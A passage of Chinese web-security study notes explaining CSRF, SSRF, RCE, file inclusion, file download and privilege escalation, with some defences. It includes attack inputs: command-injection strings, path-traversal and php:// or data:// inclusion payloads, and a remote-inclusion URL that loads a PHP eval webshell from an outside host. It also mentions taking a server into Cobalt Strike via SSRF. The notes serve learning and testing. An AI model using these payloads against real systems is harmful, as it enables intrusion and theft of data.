็›ธๅŒ็š„ๆ•ฐๆฎๅŒ…๏ผŒๅนถ่ฏฑๅฏผaๅŽป่ฎฟ้—ฎ่‡ชๅทฑ็š„็ฝ‘็ซ™๏ผŒๆญคๆ—ถaๅฐ†ไธ็Ÿฅไธ่ง‰้—ด็ป™bๆŸ่ฝฌ่ดฆใ€‚ ###### ๆ€Žไนˆๅˆคๆ–ญๆœ‰ๆฒกๆœ‰csrfๆผๆดž๏ผŸ ๆ นๆฎ็ฝ‘็ซ™็š„ๅŠŸ่ƒฝ็‚นไธ‹ๆ‰‹๏ผŒไธ€่ˆฌๅ‡บ็Žฐๅœจๅฏไปฅไฟฎๆ”นๆ•ฐๆฎใ€ๆทปๅŠ ็ฎกๅ‘˜ๆˆ–่€…ๆ›ดๆ–ฐๆ•ฐๆฎ็š„ๅœฐๆ–น ๅฏๅˆฉ็”จburp่ฟ›่กŒๆŠ“ๅŒ…ๅนถๅ‘้€่€…enfiner-csrfไธญ๏ผŒๅฐ†burp้ป˜่ฎคไบง็”Ÿ็š„htmlไปฃ็ ๆŒ‰่‡ชๅทฑ็š„้œ€ๆฑ‚่ฟ›่กŒไฟฎๆ”นๅนถๆ”พๅœจ่‡ชๅทฑ็š„็ฝ‘็ซ™ไธŠ ๅœจ็™ป้™†ๅŽๅฐ็š„ๆƒ…ๅ†ตไธ‹๏ผŒ็‚นๅ‡ปๆญคๆ–‡ไปถๅˆคๆ–ญๆ˜ฏๅฆๆ•ฐๆฎ่ขซ็ฏกๆ”น๏ผŒๅฆ‚ๆžœ็”จๆˆทๆ•ฐๆฎ่ขซ็ฏกๆ”นๅˆ™ๆ˜ฏๅญ˜ๅœจcsrfๆผๆดž็š„ ๅฆ‚ไฝ•็Ÿฅ้“ๅฏนๆ–น็š„ๆ•ฐๆฎๅŒ…ๆ˜ฏ้œ€่ฆๅœจๆœฌๅœฐๆญๅปบๅŒๆ ท็š„็Žฏๅขƒ่ฟ›่กŒๆต‹่ฏ•็š„ ###### csrf็š„ๅฎ‰ๅ…จ้˜ฒๅพกๆœบๅˆถๆœ‰ๅ“ชไบ›๏ผŸ ่ฎพ็ฝฎ้šๆœบtoken๏ผšๅฏไปฅ็†่งฃไธบๆ•ฐๆฎๅŒ…็š„ๅ”ฏไธ€ๅ€ผ๏ผŒๆ นๆฎtokenๆฅๅˆคๆ–ญๆ•ฐๆฎๅŒ…ๆ˜ฏไธๆ˜ฏไน‹ๅ‰ๅŽŸๅง‹็š„๏ผŒ่€Œไธๆ˜ฏๅˆซไบบๆž„้€ ็š„๏ผŒๆœ‰token่ฎค่ฏ็š„่ฏไธ€่ˆฌๅฐฑๆฒกๆœ‰CSRFๆผๆดžไบ†๏ผŒๆฏๆฌกไฟฎๆ”นๆ•ฐๆฎ็š„tokenๅ€ผ้ƒฝๆ˜ฏๅ”ฏไธ€็š„ ๅœจๅˆซ็š„็ฝ‘็ซ™้‡Œ่พนๅˆ™ไผšๅ‡บ็ŽฐไธๅŒ็š„tokenๅ€ผ๏ผŒๅˆ™ไผช้€ ๅคฑ่ดฅ๏ผŒtokenๆ˜ฏ้šๆœบไบง็”Ÿ็š„้žๅธธ้•ฟ็š„ไธ€้•ฟไธฒ๏ผŒๆ— ๆณ•่ฟ›่กŒ็ˆ†็ ด ไนŸๅฏไปฅ่ฟ›่กŒๅŒๆบ็ญ–็•ฅ๏ผšๆฃ€ๆต‹referer็š„ๆฅๆบ๏ผŒๅœจ่‡ชๅทฑ็š„็ฝ‘็ซ™ไธŠ่ฎฟ้—ฎ่‡ชๅทฑ็š„ๆŸไบ›ๅœฐๅ€ๆ—ถ๏ผŒๆ•ฐๆฎๅŒ…ๆฅๆบrefererๆ˜ฏ่‡ชๅทฑ ๅœจ่‡ชๅทฑ็š„็ฝ‘็ซ™ไธŠ่ฎฟ้—ฎๅˆซไบบ็š„ๅœฐๅ€็š„ๆ—ถ๏ผŒrefererไผšๆ˜ฏๅ…ถไป–ไธไบˆๆ‰ง่กŒ๏ผŒไฝ†ๆ˜ฏๅฏนๆ–นๆ˜ฏๆฃ€ๆต‹ๅŒๆบ็š„้˜ฒๅพก็ญ–็•ฅๆ—ถ๏ผŒๅฏไปฅ้€š่ฟ‡ๆŠ“ๅŒ…ไฟฎๆ”นๆฌกๆฅๆบ ### 15.ssrfๆ˜ฏไป€ไนˆ๏ผŸ ###### SSRF ๆœๅŠกๅ™จ่ฏทๆฑ‚ไผช้€ (ๆœๅŠกๅ™จๆŽฅๅ—่ฟœ็จ‹ๅœฐๅ€ๆ”นไธบๆœๅŠกๅ™จๆŽฅๅ—ๆœฌๅœฐๅœฐๅ€) ็›ฎๆ ‡๏ผšไปŽๅค–็ฝ‘ๆ— ๆณ•่ฎฟ้—ฎ็š„ๅ†…้ƒจ็ณป็ปŸ๏ผŒๅฆ‚ๆžœๅญ˜ๅœจๆญคๆผๆดžๅฏไปฅ่ฏปๅ–ๅ…ถๅ†…็ฝ‘็š„็›ธๅ…ณไฟกๆฏ ๅŽŸๅ› ๏ผš็”ฑไบŽๆœๅŠก็ซฏๆไพ›ไบ†ไปŽๅ…ถไป–ๆœๅŠกๅ™จๅบ”็”จ่Žทๅ–ๆ•ฐๆฎ็š„ๅŠŸ่ƒฝไธ”ๆฒกๆœ‰ๅฏน็›ฎๆ ‡ๅœฐๅ€ๅš่ฟ‡่ฟ‡ๆปคๅ’Œ้™ๅˆถ ๆŒ–ๆŽ˜๏ผšไปŽWEBๅŠŸ่ƒฝไธŠๆ‰พ ๅˆ†ไบซ๏ผŒ่ฝฌ็ ๏ผŒๅœจ็บฟ็ฟป่ฏ‘๏ผŒๅ›พ็‰‡ๅŠ ่ฝฝไธŽไธ‹่ฝฝ๏ผŒๆ”ถ่—๏ผŒๆœชๅ…ฌๅผ€็š„apiๅฎž็Žฐ๏ผŒๆˆ–่€…ไปŽurlๅ‚ๆ•ฐไธŠๆ‰พ ###### ssrfๆผๆดžๆ”ปๅ‡ป่ฏดๆ˜Ž๏ผŸ ่พ“ๅ…ฅไธ€ไธช่ฟœ็จ‹็š„ๅœฐๅ€ๅ›พ็‰‡๏ผŒๅฏนๆ–นๆฅๆŽฅๅ—๏ผŒๅฏนๆ–น้œ€่ฆๅฏน่ฟœ็จ‹ๅ›พ็‰‡่ฟ›่กŒ่ฏทๆฑ‚๏ผŒๅฐ†่ฟ™ไธชๅ›พ็‰‡่ฟ›่กŒ่ฟœ็จ‹่ฏทๆฑ‚ๅœฐๅ€ไฟกๆฏๅนถไฟๅญ˜ๅˆฐๆœๅŠกๅ™จ็ซฏ ้‚ฃไนˆไนŸๅฏไปฅๅœจไธŠไผ ๅ›พ็‰‡็š„้“พๆŽฅไธญๅกซๅ†™http://127.0.0.1่Žทๅ–ๅ…ถๆœๅŠกไฟกๆฏ๏ผŒๅฏไปฅ่ฎฟ้—ฎ็š„ๅ†…็ฝ‘ๆœๅŠกhttp://192.168.31.200:22 ๆ‰€ไปฅssrfๅฎž้™…ไธŠๆ˜ฏๅ€ŸๅŠฉๆœๅŠกๅ™จไธบ่ทณๆฟ๏ผŒๅŽป่ฎฟ้—ฎๆœๅŠกๅ™จๆ‰่ƒฝ่ฎฟ้—ฎ็š„ๅ†…็ฝ‘ไฟกๆฏ ###### ssrfๅˆฉ็”จ็š„็‚นๆœ‰ๅ“ชไบ›๏ผŸ ็ซฏๅฃๆ‰ซๆ๏ผŒๆŒ‡็บน่ฏ†ๅˆซ๏ผŒๆผๆดžๅˆฉ็”จ๏ผŒๅ†…็ฝ‘ๆŽข้’ˆ็ญ‰ ๆœ‰่ฟ™ๆ ท็š„ๆผๆดž๏ผŒๅฏไปฅๅŽปๅœจๆผๆดžไบง็”Ÿ็š„ๅœฐๆ–น่พ“ๅ…ฅไธ€ไธช่ฟœ็จ‹ๆœจ้ฉฌ๏ผŒๅฐ†ๅฏนๆ–นๆœๅŠกๅ™จๅœจcsไธญไธŠ็บฟ๏ผŒๅˆฉ็”จcsๅšๅŽๆธ—้€ๆ”ปๅ‡ป ### 15.RCE๏ผˆไปฃ็ ๅŠๅ‘ฝไปคๆ‰ง่กŒๆผๆดž๏ผ‰ๆ˜ฏไป€ไนˆ๏ผŒๆ€Žไนˆไบง็”Ÿ็š„๏ผŸ ๅœจWEBๅบ”็”จไธญ๏ผŒ็จ‹ๅบๅ‘˜ๆœ‰ๆ—ถๅ€™ไธบไบ†่€ƒ่™‘็ตๆดปใ€็ฎ€ๆดๆ€ง๏ผŒไผšๅœจไปฃ็ ่ฐƒ็”จไปฃ็ ๆˆ–่€…ๅ‘ฝไปคๆ‰ง่กŒๅ‡ฝๆ•ฐๅŽปๅค„็†ใ€‚ ๆฏ”ๅฆ‚ๅฝ“ไธ€ไธชๅบ”็”จ่ฐƒ็”จไธ€ไบ›่ƒฝๅฐ†ๅญ—็ฌฆไธฒ่ฝฌๅŒ–ไธบไปฃ็ ็š„ๅ‡ฝๆ•ฐๆ—ถ๏ผŒๆฒกๆœ‰่€ƒ่™‘็”จๆˆทๆ˜ฏๅฆ่ƒฝๆŽงๅˆถ่ฟ™ไธชๅญ—็ฌฆไธฒ๏ผŒๅฐ†้€ ๆˆไปฃ็ ๆข่กŒๆผๆดžใ€‚ eval($_REQUEST['a'])ไปฃ็ ๆ‰ง่กŒๆผๆดž --> ๆผๆดžไบง็”ŸๅŽๅฏไปฅๆ‰ง่กŒ็›ธๅ…ณ่„šๆœฌไปฃ็ ๏ผŒๅฆ‚่ฏปๅ†™ๆ–‡ไปถ็ญ‰ eval(echo `$_REQUEST['a']`)ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž--> ๆผๆดžไบง็”Ÿๅฏไปฅๆ‰ง่กŒ็›ธๅ…ณๅ‘ฝไปค๏ผŒๅฆ‚ๆ“ไฝœ็ณป็ปŸ็š„ๅ‘ฝไปค๏ผŒๅฑๅฎณ็ญ‰็บง่พƒๅคง echo `$_REQUEST['a']` --> ๅฐ†ไปฃ็ ๆ‰ง่กŒๆผๆดžๅ‡็บงๅ˜ๆˆไบ†ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž ###### ๆผๆดžๅฝขๆˆ็š„ๆกไปถๆœ‰ๅ“ชไบ›๏ผŸ ๅฏๆŽงๅ˜้‡(ๆผๆดžๆ˜ฏๅฆๅญ˜ๅœจ)๏ผŒๆผๆดžๅ‡ฝๆ•ฐ๏ผˆๆผๆดžๅฝขๅผ๏ผ‰ evalๅญ—็ฌฆไธฒๅฝ“ไฝœไปฃ็ ๆ‰ง่กŒ system ๅญ—็ฌฆไธฒๅฝ“ไฝœๅ‘ฝไปคๆ‰ง่กŒ ๆผๆดžๅ‡ฝๆ•ฐๆ—ถไธŠไผ ๅˆ™ไธบไธŠไผ ๆผๆดž๏ผŒๆ˜ฏ่พ“ๅ‡บ็š„ๅˆ™ไธบXSSๆผๆดž๏ผŒไธบๆ•ฐๆฎๅบ“ๆŸฅ่ฏขๅˆ™ไธบSQLๆณจๅ…ฅ ๅฆ‚ๆžœไธ€ไธช็ฝ‘็ซ™ๅ•็บฏ็š„ๅฑ•็คบๆ–ฐ้—ป๏ผŒๆฒกๆœ‰ๆ‰ฉๅฑ•็š„ๆŽฅๅฃๅฏไพ›ๆŸฅ่ฏข๏ผŒ้‚ฃไนˆไธไผšๆœ‰ๆญคๆผๆดž ###### ไธ€่ˆฌๅฆ‚ไฝ•ๆฃ€ๆต‹ๆผๆดž๏ผŸ ็™ฝ็›’๏ผšๆœ‰ๆบ็ ๏ผŒๅˆ™ๅฐฑไปฃ็ ๅฎก่ฎก ้ป‘็›’๏ผš็ฝ‘็ซ™ไธŠ็š„ๆผๆดžๆ‰ซๆๅทฅๅ…ทawvs xray appscan๏ผŒ็ฝ‘ไธŠ็š„ๅ…ฌๅผ€ๆผๆดž๏ผŒๆ‰‹ๅทฅ็œ‹ๅ‚ๆ•ฐๅ€ผๅŠๅŠŸ่ƒฝ็‚น ๆœ‰็š„urlๅœฐๅ€ๅฐฑๅฏ่ƒฝไผšๆœ‰echo็ญ‰่„šๆœฌๆ‰ง่กŒไปฃ็ ๆˆ–่€…ๅŠ ๅฏ†ๅŽ็š„่„šๆœฌๆ‰ง่กŒไปฃ็  ###### RCEๅ‘ฝไปคๆ‰ง่กŒๆผๆดž็š„ๅˆฉ็”จ๏ผš ๆŠ“ๅŒ…ๅฏไปฅๅพˆ็ฎ€ๅ•็š„ๆฃ€ๆŸฅๅ‡บๅฏนๆ–นๆ‰€ไฝฟ็”จ็š„ๆ“ไฝœ็ณป็ปŸ๏ผŒhackerbarๅ‘ๅŒ…ๆ—ถไนŸๅฏไปฅๆ นๆฎ่‡ชๅทฑ็š„้œ€่ฆ่ฟ›่กŒไผช้€  postmanๆˆ–่€…burpsuite่ฟ›่กŒๆ•ฐๆฎ็š„ๆŠ“ๅ–ไธŽ้‡ๅ‘ๅนถไฟฎๆ”นๆไบค่‡ณ็ฝ‘็ซ™็š„ไปฃ็  ping 127.0.0.1 | ls | pwd | whoami ไผšๆ‰ง่กŒๆœ€ๅŽ่พน็š„้‚ฃๆก่ฏญๅฅ cat่กจ็คบๆญฃๅบ่พ“ๅ‡บๆ–‡ๆœฌ๏ผŒtacๅˆ™่กจ็คบๅๅบ่พ“ๅ‡บๆ–‡ๆœฌ ๅˆฉ็”จlinux็›ธๅ…ณ็š„ๅŸบๆœฌๅ‘ฝไปค่ฏปๅ–ๅ‡บๆ•ๆ„Ÿไฟกๆฏ ###### ๅฆ‚ไฝ•้˜ฒๅพกRCEไปฃ็ ๆˆ–่€…ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž๏ผŸ ๆŠŠecho ls cat tac่ฟ‡ๆปคไธ็Žฐๅฎž๏ผŒไฝ†ๅฏไปฅๅ›บๅฎšๅ˜้‡๏ผŒๅชๆ‰ง่กŒๆŸไบ›ๅ˜้‡ WAF้ƒจ็ฝฒ๏ผŒๆ‰พไธ€ไบ›ๆ”ถ่ดน็š„ไบงๅ“้ƒจ็ฝฒๅœจไธŠ้ข phpไธญๅฏๆ‰ง่กŒ็š„ๆ•ๆ„Ÿๅ‡ฝๆ•ฐ๏ผševal assert call_usr_func... ็›ดๆŽฅ็ฆ็”จไบ†ๅฎƒไปฌ ### 16.ไป€ไนˆๆ˜ฏๆ–‡ไปถๅŒ…ๅซๆผๆดž๏ผŸ ๅฐ†ๆ–‡ไปถๅŒ…ๅซ่ฟ›ๅŽปไน‹ๅŽไผš่ฐƒ็”จๆ–‡ไปถ้‡Œ็š„ไปฃ็ ๏ผŒๅณๅฐ†ๆŒ‡ๅฎš็š„ๆ–‡ไปถ็š„ไปฃ็ ๆŒ‰่„šๆœฌไปฃ็ ๆ‰ง่กŒ๏ผŒๅฏๆŽงๅˆถๅ˜้‡+includeๅ‡ฝๆ•ฐ็š„ไฝฟ็”จ้€ ๆˆๆ–‡ไปถๅŒ…ๅซๆผๆดž ๅฆ‚ๆŸ1.txtไธญๅญ˜ๆœ‰phpinfo();็š„ไฟกๆฏ๏ผŒๅˆ™ๅœจurlๆ‹ผๆŽฅๆญคๆ–‡ๆœฌไผš่ฟ›่กŒๆ‰ง่กŒ๏ผŒ้‚ฃไนˆๅฐฑๆ˜ฏๅญ˜ๅœจๆ–‡ไปถๅŒ…ๅซๆผๆดž ๆ–‡ไปถๅŒ…ๅซๆผๆดž็›ดๆŽฅๅฐ†ๅ…ถไป–้ž่„šๆœฌไปฃ็ ๆŒ‰่„šๆœฌไปฃ็ ๆฅๆ‰ง่กŒ ###### ๅฆ‚ไฝ•ๆฃ€ๆต‹ๆ–‡ไปถๅŒ…ๅซๆผๆดž๏ผŸ ็™ฝ็›’๏ผšไปฃ็ ๅฎก่ฎก ้ป‘็›’๏ผšๆผๆ‰ซ๏ผŒๅ…ฌๅผ€ๆผๆดž๏ผŒๆ‰‹ๅทฅ็œ‹ๅ‚ๆ•ฐๅ€ผๅŠๅŠŸ่ƒฝ็‚น ###### ๆ–‡ไปถๅŒ…ๅซๆผๆดžๆœ‰ๅ“ชไบ›๏ผŸ ๆœฌๅœฐๆ— ้™ๅˆถ็š„ๅŒ…ๅซๆผๆดž๏ผšๅช่ƒฝๅˆฉ็”จๆœฌๅœฐๆ–‡ไปถๅฆ‚๏ผšhttp://192.168.31.200/include.php?filename=../../../../../../1.txt ๆœฌๅœฐๆœ‰้™ๅˆถ็š„ๅŒ…ๅซๆผๆดž๏ผšๆœ‰ไธ€ไบ›ๅนฒๆ‰ฐ๏ผŒ้œ€่ฆ็”จ็‰นๆฎŠ็š„ๆ–นๆณ•็ป•่ฟ‡๏ผŒๅฆ‚๏ผš http://192.168.31.200/include.php?filename=phpinfo.txt%00 php็‰ˆๆœฌ<5.3.4 http://192.168.31.200/include.php?filename=phpinfo.txt..........................้•ฟๅบฆๆˆชๆ–ญ๏ผŒwindowsๅช่ƒฝ่ฏ†ๅˆซ256ไฝ๏ผŒlinux้•ฟไบŽ4096ไฝ ่ฟœ็จ‹ๆ–‡ไปถๆ— ้™ๅˆถๅŒ…ๅซๆผๆดž๏ผšๅฏไปฅ่‡ชๅทฑๅŽปๅˆ›ๅปบ็กฎๅฎšๅฏนๆ–นๅฏ่ฎฟ้—ฎ็š„ๆ–‡ไปถๅฆ‚๏ผšhttp://192.168.31.200/include.php?filename=http://chentuo.asia/1.txt๏ผŒๅˆฉ็”จๆญคๆผๆดžๅฏไปฅๅŠ ไธŠ<?php @eval($_POST['x']);?>๏ผŒๅˆฉ็”จ่œๅˆ€่ฟžๆŽฅ ่ฟœ็จ‹ๆ–‡ไปถๆœ‰้™ๅˆถๅŒ…ๅซๆผๆดž๏ผšๅฆ‚?filename=http://chentuo.asia/1.txt%00๏ผŒ?filename=http://chentuo.asia/1.txt%23 ###### ๆ–‡ไปถๅŒ…ๅซๆผๆดž็š„ๅˆฉ็”จ๏ผŸ ?filename=php://filter/read=convert.base64-encode/resource=1.txt ?filename=php://filter/read=convert.base64-encode/resource=index.php (ไธ้œ€่ฆๆ‰“ๅผ€ๅผ€ๅ…ณ) ?filename=php://input http://192.168.31.200/include.php?filename=file:///C:/1.txt http://192.168.31.200/include.php?filename=data://text/plain,<?php phpinfo();?> http://192.168.31.200/include.php?filename=data://text/plain,<?php echo 'shabi';?> ๅˆฉ็”จๆ—ถ้œ€่ฆๆŸฅๆ‰พ่ต„ๆ–™ๅˆคๆ–ญๆ˜ฏๅฆๆ”ฏๆŒ็›ธๅ…ณๅ่ฎฎ็š„ไฝฟ็”จ ### 17.ๆ–‡ไปถไธ‹่ฝฝๆผๆดž๏ผŸ ๆ–‡ไปถ่ขซ่งฃๆž๏ผšๅˆ™ๆ˜ฏๆ–‡ไปถๅŒ…ๅซๆผๆดž๏ผ›ๆ˜พ็คบๆบไปฃ็ ๏ผšๅˆ™ๆ˜ฏๆ–‡ไปถ่ฏปๅ–ๆผๆดž๏ผ›ๆ–‡ไปถ่ขซไธ‹่ฝฝ๏ผŒๅˆ™ๆ˜ฏๆ–‡ไปถไธ‹่ฝฝๆผๆดžใ€‚ ๅฆ‚ๆžœไธ‹่ฝฝไธๅˆฐๆ•ฐๆฎๅบ“้…็ฝฎๆ–‡ไปถๆˆ–่€…web.xml็ญ‰๏ผŒๅฏไปฅๅŽปไธ‹่ฝฝ่ทŸ็ณป็ปŸ็›ธๅ…ณ็š„้…็ฝฎไฟกๆฏ ###### ๆ–‡ไปถไธ‹่ฝฝๆผๆดžไธญ็š„ๆณจๆ„็‚น๏ผš ๅฏไปฅไธ‹่ฝฝไธ€ไบ›ๆถๆ„ๆ–‡ไปถ๏ผšๅŽๅฐ้ฆ–้กตๆ—ฅๅฟ—ๆ–‡ไปถ๏ผŒๆ•ฐๆฎๅบ“้…็ฝฎๆ–‡ไปถ๏ผˆๆ‰ซๆๅทฅๅ…ท็ˆฌ่กŒๆˆ–่ฟ™ไธ‹่ฝฝๅฅฝ็š„ไปฃ็ ๅŽปๅˆ†ๆž่ทฏๅพ„๏ผ‰๏ผŒๅ„็งๆŽฅๅฃๆ–‡ไปถ๏ผŒๅฏ†้’ฅไฟกๆฏ็ญ‰ๆ–‡ไปถ ็›ฎๅฝ•็ˆฌ่กŒๅฏปๆ‰พๅทฒ็Ÿฅๆ–‡ไปถ็š„็›ฎๅฝ•๏ผŒๆŸฅ็œ‹ๆบ็ ไธญ็š„includeๅฏปๆ‰พๆ›ดๅคš็š„ๆ•ๆ„Ÿ็›ฎๅฝ•ไฟกๆฏ,้€š่ฟ‡่ทณ็บงๅณ../็š„ๅฝขๅผๅŽปไธ‹่ฝฝๅพ—ๅˆฐ่ทฏๅพ„็š„ๆ•ๆ„Ÿๆ–‡ไปถ /Users/chentuo/Public/tool/webpath_็ฝ‘็ซ™็›ฎๅฝ•ๅญ—ๅ…ธ/DirScan ๆฅ่‡ชๅฎ‰ๅ…จๅœˆ็š„ๅญ—ๅ…ธ/php.txtๆ˜ฏไธชๅพˆๅ…จ็š„ๅญ—ๅ…ธ ่ƒฝไธ‹่ฝฝๅˆฐ็š„ไธŽ็›ดๆŽฅๅœจๅ‰็ซฏurl็•Œ้ขไธŠๆ‹ผๆŽฅๅœฐๅ€็š„ๅฎŒๅ…จๆ˜ฏไธไธ€ๆ ท็š„๏ผŒไธ€ไธชๆ˜ฏๆบๆ–‡ไปถ๏ผŒไธ€ไธชๆ˜ฏๅทฒ็ป่ขซ่งฃ้‡ŠๅŽ็š„ๆ–‡ไปถใ€‚ ###### javaไธญ้…็ฝฎๆ–‡ไปถ็š„ไธ‹่ฝฝ๏ผš ๅฆ‚ไฝ•ๅ‘็Žฐไบ†ไธ‹่ฝฝๆผๆดžไฝ†ๆ˜ฏgetๆ–นๆณ•ๆ— ๆณ•่Žทๅ–ๅˆฐๆ–‡ไปถ๏ผŒๅฏไปฅๅฐ่ฏ•ๅˆ‡ๆขๅˆฐpostๆˆ–่€…ๅ…ถไป–ๆไบคๆ–นๅผ่ฟ›่กŒไธ‹่ฝฝ javaWEBไธญWEB็š„้…็ฝฎๆ–‡ไปถWEB-INF/web.xml๏ผŒ้‡Œ่พนๆœ‰ๅพˆๅคš้‡่ฆ็š„ไฟกๆฏ ้…็ฝฎๆ–‡ไปถไธญ็š„com.wm.ctf.FlagController่กจ็คบๅฎž้™…ไธญ็š„WEB-INF/classes/com/wm/ctf/FlagController.class ###### phpไธญ้…็ฝฎๆ–‡ไปถ็š„ไธ‹่ฝฝ๏ผš ๅฆ‚ๆžœ้œ€่ฆ็™ป้™†ๅฏไปฅ็‚นๅ‡ป็™ป้™†ๆŸฅ็œ‹ไธ€ไธ‹ๆ•ฐๆฎๅŒ…่ฟ›่กŒๅˆ†ๆžๆ•ฐๆฎๅŒ… ๅˆ†ๆžurlๅœฐๅ€ๅˆคๆ–ญๆ˜ฏๅฏ่ƒฝๅญ˜ๅœจๅ“ช็งๆผๆดž๏ผŒๅˆคๆ–ญๅฏนๆ–นๆ˜ฏๆ นๆฎๅ“ชไธชๅ…ณ้”ฎๅญ—่ฏ†ๅˆซๆ˜ฏๅฆ็™ป้™†็š„ ๅฆ‚ๆžœๆœ‰mvc็š„ๆก†ๆžถ๏ผŒๅฏไปฅๅŽปๅฐ่ฏ•ไธ‹่ฝฝmoduleไธญ็š„ๆ•ๆ„Ÿๆ–‡ไปถๅฆ‚..xx../etc/nginx/nginx.conf ###### ้ป‘็›’ๆƒ…ๅ†ตไธ‹ๅฆ‚ไฝ•ๅ‘็Žฐๆ–‡ไปถไธ‹่ฝฝๆผๆดž๏ผŸ ๆ นๆฎๆ–‡ไปถๅๅ’Œๅ‚ๆ•ฐๅ€ผใ€ๅŠŸ่ƒฝ็‚นๅŽปๅ‘็Žฐ๏ผš read.xxx?filename= down.xxx?filename= readfile.xxx?file= downfile.xxx?file= ../ ..\ .\ ./็ญ‰ %23 ? %00 %20 .็ญ‰ &readpath &filepath &path &inputfile &url &data &readfile &menu &META-UNF WEB-INF ### 18.้™ๆ€็ผ–่ฏ‘ๅ’ŒๅŠจๆ€่งฃ้‡Š๏ผš ็ผ–่ฏ‘ๅž‹่ฏญ่จ€ๅฎšไน‰๏ผš็ผ–่ฏ‘ๅž‹่ฏญ่จ€้ฆ–ๅ…ˆๆ˜ฏๅฐ†ๆบไปฃ็ ็ผ–่ฏ‘็”Ÿๆˆๆœบๅ™จๆŒ‡ไปค๏ผŒๅ†็”ฑๆœบๅ™จ่ฟ่กŒๆœบๅ™จ็  (ไบŒ่ฟ›ๅˆถ)ใ€‚ ่งฃ้‡Šๅž‹่ฏญ่จ€็š„ๅฎšไน‰๏ผš่งฃ้‡Šๅž‹่ฏญ่จ€็š„ๆบไปฃ็ ไธๆ˜ฏ็›ดๆŽฅ็ฟป่ฏ‘ๆˆๆœบๅ™จๆŒ‡ไปค๏ผŒ่€Œๆ˜ฏๅ…ˆ็ฟป่ฏ‘ๆˆไธญ้—ดไปฃ็ ๏ผŒๅ†็”ฑ่งฃ้‡Šๅ™จๅฏนไธญ้—ดไปฃ็ ่ฟ›่กŒ่งฃ้‡Š่ฟ่กŒใ€‚ ###### javaๆ˜ฏๅฑžไบŽ้™ๆ€็ผ–่ฏ‘่ฟ˜ๆ˜ฏๅŠจๆ€่งฃ้‡Š๏ผŸ ็ผ–่ฏ‘ๅž‹ๅ’Œ่งฃ้‡Šๅž‹็š„ๅฎšไน‰ๆ˜ฏๅฏน็ซ‹ๅญ˜ๅœจ็š„๏ผŒไฝ†ไนŸๅฏไปฅๅœจไธ€ไธช่ฏญ่จ€ไธญๅŒๆ—ถๅญ˜ๅœจใ€‚ๆฏ”ๅฆ‚ java ่ฏญ่จ€ๅŒๆ—ถๅ…ผๆœ‰็ผ–่ฏ‘ๅž‹ๅ’Œ่งฃ้‡Šๅž‹็‰น็‚นใ€‚ๆ•ดไธชๆต็จ‹ๅฆ‚ไธ‹๏ผš ๅฐ†ๆบไปฃ็ ๏ผˆ.java ๆ–‡ไปถ๏ผ‰็ผ–่ฏ‘็”Ÿๆˆๅญ—่Š‚็ ๏ผˆ.class ๆ–‡ไปถ๏ผ‰๏ผŒๅ†้€š่ฟ‡ JVM๏ผˆjava ่™šๆ‹Ÿๆœบ๏ผ‰่ฟ่กŒ็”Ÿๆˆๆœบๅ™จๆŒ‡ไปค๏ผŒ็”ฑๆœบๅ™จ่ฟ่กŒๆœบๅ™จ็ ใ€‚ๆณจๆ„๏ผŒๆญคๅค„็”Ÿๆˆๆœบๅ™จ่ฏญ่จ€ๅ‰็š„ๆ“ไฝœๆ˜ฏ่งฃ้‡Šๅž‹๏ผŒๆฏๆฌก่ฟ่กŒ้ƒฝ่ฆ้‡ๆ–ฐ่งฃ้‡Šใ€‚ๅ› ๆญค๏ผŒๆญคๅค„่กจๆ˜Ž java ๆ˜ฏ่งฃ้‡Šๅž‹ใ€‚ ไฝ†ๆ˜ฏ๏ผŒ้ƒจๅˆ† JVM๏ผˆjava ่™šๆ‹Ÿๆœบ๏ผ‰ๆœ‰ไธ€็ง JIT๏ผˆJust in time๏ผ‰ๆœบๅˆถ๏ผŒ่ƒฝๅคŸๅฐ†้ƒจๅˆ†ๅทฒ็ป่งฃ้‡Š็ฟป่ฏ‘็š„ๅธธ็”จๆœบๅ™จๆŒ‡ไปคไฟๅญ˜ใ€‚ไธ‹ๆฌกไธ้œ€่ฆ่งฃ้‡Š๏ผŒ็›ดๆŽฅ่ฟ่กŒๅณๅฏใ€‚ๆญคๆ—ถ java ๆ˜ฏ็ผ–่ฏ‘ๅž‹ใ€‚ ๅ› ๆญค๏ผŒ็Žฐๅœจ็”จ็ผ–่ฏ‘ๅž‹ๅ’Œ่งฃ้‡Šๅž‹ๅŒบๅˆ†่ฏญ่จ€ๆ˜ฏ่กŒไธ้€š็š„ใ€‚ ### 19.ไป€ไนˆๆ˜ฏ้€ป่พ‘่ถŠๆƒ๏ผŒๅˆ†ไธบๅ“ชๅ‡ ็ง๏ผŸๅ„ๆœ‰ไป€ไนˆๆ ท็š„ๅฑๅฎณ๏ผŸ ๆฐดๅนณ่ถŠๆƒ๏ผšๆ™ฎ้€š็”จๆˆทAๆœ‰ไบ†ๆ™ฎ้€š็”จๆˆทB็š„่ฎฟ้—ฎๆƒ้™ ๅฑๅฎณๅˆฐไบ†็ฝ‘็ซ™ไธŠๅ…ถไป–็”จๆˆทไฟกๆฏ็š„ๅฎ‰ๅ…จ ๅž‚็›ด่ถŠๆƒ๏ผšๆ™ฎ้€š็”จๆˆทAๆœ‰ไบ†็ฎก็†ๅ‘˜ๆˆ–่€…่ถ…็บง็ฎก็†ๅ‘˜็š„ๆƒ้™ ๆœชๆŽˆๆƒ่ฎฟ้—ฎ๏ผšไธ้œ€่ฆ็™ป้™†ๅฐฑๆœ‰ไบ†ๆƒ้™๏ผŒๅฏไปฅๆ“ไฝœ้œ€่ฆ็™ป้™†ๆ‰่ƒฝๆ“ไฝœ็š„่กŒไธบ ###### ๆฐดๅนณ่ถŠๆƒไธญๅ‰ๆœŸไฟกๆฏๆ”ถ้›†ๅฆ‚ไฝ•่Žทๅพ—ๅ…ถไป–ไบบ็š„ๅ็งฐไฟกๆฏ๏ผŸ ็ฝ‘็ซ™็š„ๆณจๅ†Œ๏ผŒๅฆ‚ๆžœ็”จๆˆทๅๅทฒ็ปๆณจๅ†Œ๏ผŒ่กจ็คบ่ฟ™ไธช็”จๆˆทๆ˜ฏๅญ˜ๅœจ็š„ ็ฝ‘็ซ™ๅฏไปฅ่ฎฟ้—ฎๅ…ถไป–ไบบ็š„็ฉบ้—ดๅฏไปฅๅˆคๆ–ญ่ฟ™ไธชไบบๆ˜ฏๅฆๅญ˜ๅœจ ###### ๅž‚็›ด่ถŠๆƒ้‡Œ่พนๆ˜ฏๅฆๅฏไปฅๆ‹ฟๅˆฐๅฏไปฅไผช้€ 